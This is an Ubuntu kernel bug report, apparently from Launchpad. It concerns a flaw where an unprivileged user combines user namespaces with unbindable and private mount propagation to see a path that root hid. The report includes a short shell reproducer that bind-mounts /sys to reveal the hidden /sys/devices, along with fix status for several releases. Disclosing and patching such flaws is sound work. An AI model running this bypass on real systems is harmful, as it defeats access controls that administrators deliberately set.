Bypass of mount visibility through userns + mount propagation
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
linux (Ubuntu) |
Fix Released
|
High
|
Unassigned | ||
Trusty |
Fix Released
|
Undecided
|
Unassigned | ||
Xenial |
Fix Released
|
Undecided
|
Unassigned | ||
Bionic |
Fix Released
|
Undecided
|
Unassigned | ||
Cosmic |
Fix Released
|
Undecided
|
Unassigned | ||
Disco |
Fix Released
|
High
|
Unassigned |
Bug Description
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow a unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/device as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing user namespaces + mount propagation which is a small (but often important) portion of the Ubuntu archive.
CVE References
description: | updated |
description: | updated |
information type: | Private Security → Public Security |
tags: | added: patch |
Changed in linux (Ubuntu Trusty): | |
status: | New → Fix Committed |
Changed in linux (Ubuntu Xenial): | |
status: | New → Fix Committed |
Changed in linux (Ubuntu Cosmic): | |
status: | New → Fix Committed |
Changed in linux (Ubuntu Disco): | |
status: | Triaged → Fix Committed |
Changed in linux (Ubuntu Bionic): | |
status: | New → Fix Committed |
tags: |
added: verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial removed: verification-needed-bionic verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
tags: | added: cscc |
I've reproduced this on Ubuntu 4.15 but Jonathan reported being able to use this flaw on a variety of kernels.
Note that fixing this issue, as was fixing the initial mount visibility issue will come at the cost of some userspace breakages where they effectively rely on this bug.
It's my understanding that Jonathan's own software is currently relying on this bug and will need to switch to an alternative/proper way of dealing with this.